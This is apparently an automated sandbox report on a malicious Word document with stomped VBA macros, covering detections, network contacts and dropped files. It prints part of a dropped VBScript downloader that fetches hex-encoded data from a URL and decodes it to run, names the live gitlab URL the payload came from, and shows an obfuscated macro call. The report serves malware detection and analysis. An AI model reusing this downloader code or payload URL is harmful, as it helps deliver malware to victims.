Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: 0dsIoO7xjt.docxStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: 0dsIoO7xjt.docxOLE indicator, VBA stomping: true
Source: ~WRD0000.tmp.0.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information331
Scripting		Valid Accounts23
Exploitation for Client Execution		331
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager3
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
0dsIoO7xjt.docx51%VirustotalBrowse
0dsIoO7xjt.docx42%ReversingLabsScript-Macro.Trojan.Amphitryon
0dsIoO7xjt.docx100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.20
truefalse
    		high
    gitlab.com
    		172.65.251.78
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://gitlab.com/app8490744/updatesa/-/raw/main/upfalse
        		high

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        172.65.251.78
        		gitlab.comUnited States
        		13335CLOUDFLARENETUSfalse

        General Information

        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1590809
        Start date and time:2025-01-14 16:37:31 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 44s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Without Instrumentation
        Number of analysed new started processes analysed:12
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:0dsIoO7xjt.docx
        renamed because original name is a hash value
        Original Sample Name:01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e.docx
        Detection:MAL
        Classification:mal100.expl.evad.winDOCX@4/10@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 52.109.28.47, 217.20.57.20, 184.28.90.27, 52.182.143.214, 2.21.65.130, 2.21.65.149, 184.51.148.194, 184.51.148.162, 2.18.64.220, 2.18.64.211, 2.20.245.225, 2.20.245.216, 52.111.236.34, 52.111.236.32, 52.111.236.33, 52.111.236.35, 40.126.32.76, 52.149.20.212, 13.107.246.45, 172.202.163.200
        • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.natur
        • Report size exceeded maximum capacity and may have missing network information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
        • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
        • 84.201.210.39
        original.emlGet hashmaliciousUnknownBrowse
        • 217.20.57.34
        RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
        • 84.201.210.23
        577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
        • 84.201.210.39
        3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
        • 217.20.57.18
        Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
        • 217.20.57.20
        40#U0433.docGet hashmaliciousUnknownBrowse
        • 84.201.210.39
        Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
        • 217.20.57.18
        3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
        • 217.20.57.35
        JUbmpeT.exeGet hashmaliciousVidarBrowse
        • 217.20.57.18
        gitlab.comq9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        VRO.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        VRO.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        e0691gXIKs.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUShttp://wagestream.acemlnb.comGet hashmaliciousUnknownBrowse
        • 104.20.0.15
        Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
        • 104.18.95.41
        Payment_243.jsGet hashmaliciousNetSupport RATBrowse
        • 172.67.68.212
        Payment_243.jsGet hashmaliciousNetSupport RATBrowse
        • 104.26.0.231
        http://vionicstore.shopGet hashmaliciousUnknownBrowse
        • 104.18.73.116
        http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
        • 104.17.25.14
        https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
        • 172.67.197.240
        mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
        • 172.67.150.129
        https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
        • 188.114.96.3
        http://secure.ezpassbgy.top/payGet hashmaliciousUnknownBrowse
        • 104.21.15.205

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37f463bf4616ecd445d4a1937da06e19inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 172.65.251.78
        1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 172.65.251.78
        LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 172.65.251.78
        2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 172.65.251.78
        183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
        • 172.65.251.78
        Handler.exeGet hashmaliciousDanaBot, VidarBrowse
        • 172.65.251.78

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\up[1].txt

        Download File
        Process:C:\Windows\SysWOW64\wscript.exe
        File Type:ASCII text, with very long lines (65536), with no line terminators
        Category:dropped
        Size (bytes):78347968
        Entropy (8bit):3.9608770038040686
        Encrypted:false
        SSDEEP:24576:CPeNKU1jkuVGTONfLKNvW4zuRfddSylFijQgAu55ZVaFZDyqlPN+aX49HbzyP+mA:+
        MD5:867EB339A005A6C7A63D6F9C81D7EA98
        SHA1:A30386E1345672ADFBAFB333936025B57C757FEE
        SHA-256:5C1997166E6ED7BD049B5A4CFD074C230B867A8743BF668102AA1E1E41DEF33C
        SHA-512:71D8E511AEA3C0BB625B86F6161577F4CDD869026708C8CF8CE412CD7861292376B879A02442FF40FE6394CEED9E6BAC0D930FD244239E4ACE8B9D03D13E13CE
        Malicious:false
        Yara Hits:
        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\up[1].txt, Author: Florian Roth
        Reputation:low
        Preview:4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000000a598b174e38e5444e38e5444e38e544474076445838e5448dbbe6455a38e5448dbbe1455c38e5448dbbe0451138e5443eb9e1454638e5443eb9e4454338e5444e38e444463ae5445dbce6455b38e5445dbcec45c33ae5445dbce5454f38e5445dbc1a444f38e5445dbce7454f38e544526963684e38e54400000000000000005045000064860a00215f11670000000000000000f00022000b020e2800aa6100008232000000000090fe5c00001000000000004001000000001000000002000006000000000000000600000000000000000096000004000000000000020060c100001800000000000010000000000000000010000000000000100000000000000000000010000000f0667900c4000000b46779006801000000708000b008150000a07b00fc600300f8a35502681b0000008095002c7e0000b0a67000540000000000000000000000000000000000000080a87000280000004045620040010000000000000000000000d06100c80e0000a4647900

        C:\Users\user\AppData\Local\Temp\~DF2E3B14EBBF130EF0.TMP

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Reputation:high, very likely benign file
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\~DF59D505D02F213530.TMP

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Reputation:high, very likely benign file
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\~DF8CA300ABCDC68CFC.TMP

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Reputation:high, very likely benign file
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\~DFBB7AD3442482D458.TMP

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\Desktop\0dsIoO7xjt.doc (copy)

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: user, Revision Number: 26, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Mon Dec 16 03:28:00 2024, Last Saved Time/Date: Tue Jan 14 15:38:00 2025, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0
        Category:dropped
        Size (bytes):97280
        Entropy (8bit):5.029011868945644
        Encrypted:false
        SSDEEP:1536:1xrt3Ou2qb5Lj90/ph6PhGi/dB1P1AHyEivP2ZcCi8tXpEvMcz8EoXK:r1tLj90/P6PhGi/dB1P1AHyEivuZc986
        MD5:ECC33B72D0E46C43ED0632EE5FDE71AC
        SHA1:E2265EB83F771031828C10C6E866841BBF67AE86
        SHA-256:C838D789643B32F74C2BF9F04BF5D294709476AA6F69AA27ED54588374CD4DD9
        SHA-512:DDFFC12084A894CF52EB788428F5A76B13D957E2BCD5BAC40FEEC5A8C4C8F13B6C4E3BD0A16C2AFA0E7C3AEF7C6F9E5A7002664397CA6BC301913EC51E4A747A
        Malicious:false
        Preview:......................>.......................(...........*...............'...1..................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................2.....bjbj0.0...........................R.eiR.ei..................................................................................F.......F...............................................................................................................t...................................................................9...a...............................................$...........C...@.........................................................................

        C:\Users\user\Desktop\~$sIoO7xjt.doc

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.7960403739622812
        Encrypted:false
        SSDEEP:3:klt+lllNIBPNHnE6ldlflleDMRR1G:7taNHE6UDMRR1G
        MD5:228DFF6A84E6F847BF93B2C78B6E3595
        SHA1:F666E59452A702C654EC659F3CE386439D93181D
        SHA-256:7EFE98C569D2E71017CC800F6FFA64EAF80CBEEA9CFE744809BF1730448986DD
        SHA-512:EE02D6012C8F88B0279B371698319CD89FA495989B7CABE8083BFC67336EF8E0C35F93BCDECC0E3FF1D217159625F04817B25B7138B2782D07071BAC32712A2D
        Malicious:false
        Preview:.user.................................................a.l.f.o.n.s............(...........a.i.............................................(...%..}..i.........=.i

        C:\Users\user\Desktop\~WRD0000.tmp

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: user, Revision Number: 26, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Mon Dec 16 03:28:00 2024, Last Saved Time/Date: Tue Jan 14 15:38:00 2025, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0
        Category:dropped
        Size (bytes):97280
        Entropy (8bit):5.029011868945644
        Encrypted:false
        SSDEEP:1536:1xrt3Ou2qb5Lj90/ph6PhGi/dB1P1AHyEivP2ZcCi8tXpEvMcz8EoXK:r1tLj90/P6PhGi/dB1P1AHyEivuZc986
        MD5:ECC33B72D0E46C43ED0632EE5FDE71AC
        SHA1:E2265EB83F771031828C10C6E866841BBF67AE86
        SHA-256:C838D789643B32F74C2BF9F04BF5D294709476AA6F69AA27ED54588374CD4DD9
        SHA-512:DDFFC12084A894CF52EB788428F5A76B13D957E2BCD5BAC40FEEC5A8C4C8F13B6C4E3BD0A16C2AFA0E7C3AEF7C6F9E5A7002664397CA6BC301913EC51E4A747A
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:......................>.......................(...........*...............'...1..................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................2.....bjbj0.0...........................R.eiR.ei..................................................................................F.......F...............................................................................................................t...................................................................9...a...............................................$...........C...@.........................................................................

        C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:true
        Preview:[ZoneTransfer]....ZoneId=0

        C:\Users\user\Documents\WindowServices.vbs

        Download File
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        File Type:ISO-8859 text, with CRLF line terminators
        Category:dropped
        Size (bytes):2501
        Entropy (8bit):5.020222323449452
        Encrypted:false
        SSDEEP:48:7ATWCvMRrEbJ30Ubwa4nqS4YI0Mp3+yaFWjW2OwLCx/nMDKHxQS:7ATWCLJFbunqzx0MQyOKW2O+g/nMDKHb
        MD5:D2E302C91AF3A9659A3D83138C7A7730
        SHA1:AA414DA697FE383233787170F5602544A056D3BC
        SHA-256:AAB8903BFD0FAF05E2168C7AFFF5F3084BC04DEF3C8C4B12CB47E2E74F684C06
        SHA-512:F8FE7A25F7B7F5A23D4CF69168F53DE0B2FA0CF99CDCF6850F8564F4FDDA96265E9C3B33F6A1EAB80E2F0E32BB9A06EBD6FB3DC4894350C978853B7126EDE513
        Malicious:true
        Preview:Option Explicit..On Error Resume Next ' B? qua c.c th.ng b.o l?i....' Chuy?n d?i chu?i hex sang d?ng nh? ph.n..Function HexToBinary(hexString).. Dim i.. Dim length.. Dim byteArray().... length = Len(hexString) \ 2.. ReDim byteArray(length - 1).... For i = 0 To length - 1.. byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2)).. Next.... HexToBinary = byteArray..End Function....' T?i d? li?u t? URL..Function GetDataFromURL(url).. Dim http.. Set http = CreateObject("MSXML2.XMLHTTP").. http.Open "GET", url, False.. http.Send.... If http.Status = 200 Then.. GetDataFromURL = http.responseText.. Else.. GetDataFromURL = "" .. End If.. Set http = Nothing..End Function....' Gi?i m. v. ch?y l?nh t? chu?i nh? ph.n..Sub ExecuteDecryptedCode().. Dim EncodedBinary.. Dim binaryData.. Dim SavePath.. Dim fileNum.. Dim objFSO.. Dim objFile.. Dim i.... ' L?y chu?i nh? ph.n t? trang web.. EncodedBinary = Ge

        Static File Info

        General

        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: george, Revision Number: 25, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Sun Dec 15 16:12:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0
        Entropy (8bit):5.0423425766922865
        TrID:
        • Microsoft Word document (32009/1) 54.23%
        • Microsoft Word document (old ver.) (19008/1) 32.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
        File name:0dsIoO7xjt.docx
        File size:96'768 bytes
        MD5:0e9896e59a862c48c6543c7cb0c8b58d
        SHA1:4681d90574c5644de87641b298b020f0dc076c06
        SHA256:01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e
        SHA512:5738cc68015d87992e89f46ea620169d7202e4c35d85aeba33076836ba14dbffbde2df192d74a7acefe435b636db08788fef03371c7115e86f308ff3aec6a0f7
        SSDEEP:1536:zyktu2qb5Lj90/ph6PhGi/dB1P1AHyEivP2ZcCi8tXpEvMcz8EoXK:zatLj90/P6PhGi/dB1P1AHyEivuZc986
        TLSH:4D932859F582C92EDBD809764C9BD7FAB3787D066E44D7173260B35E2CB27A4C106384
        File Content Preview:........................>.......................'...........)...............&...0..............................................................................................................................................................................

        File Icon

        Icon Hash:35e5c48caa8a8599

        Static OLE Info

        General

        Document Type:OLE
        Number of OLE Files:1

        OLE File "0dsIoO7xjt.docx"

        Indicators
        Has Summary Info:
        Application Name:Microsoft Office Word
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Summary
        Code Page:1252
        Title:
        Subject:
        Author:ADMIN
        Keywords:
        Comments:
        Template:Normal
        Last Saved By:george
        Revion Number:25
        Total Edit Time:1560
        Create Time:2024-12-16 06:28:00
        Last Saved Time:2024-12-15 16:12:00
        Number of Pages:1
        Number of Words:3
        Number of Characters:22
        Creating Application:Microsoft Office Word
        Security:0
        Document Summary
        Document Code Page:1252
        Number of Lines:1
        Number of Paragraphs:1
        Thumbnail Scaling Desired:False
        Company:
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:1048576

        Streams with VBA

        VBA File Name: Module1.bas, Stream Size: 1446
        General
        Stream Path:Macros/VBA/Module1
        VBA File Name:Module1.bas
        Stream Size:1446
        Data ASCII:. . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < 4 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . .
        Data Raw:01 16 03 00 00 f0 00 00 00 1a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 22 03 00 00 a2 04 00 00 00 00 00 00 01 00 00 00 d4 44 12 16 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "Module1"
Public Sub CallTestAES()
    Dim kakensooe As New ViewSession
    Dim methodName As String

    ' Ghp tn hm t? cc ph?n nh?
    methodName = "ikwi" & "wiejs" & "_19293_Ade"

    ' G?i hm b?ng tn d ghp
    CallByName kakensooe, methodName, VbMethod
End Sub

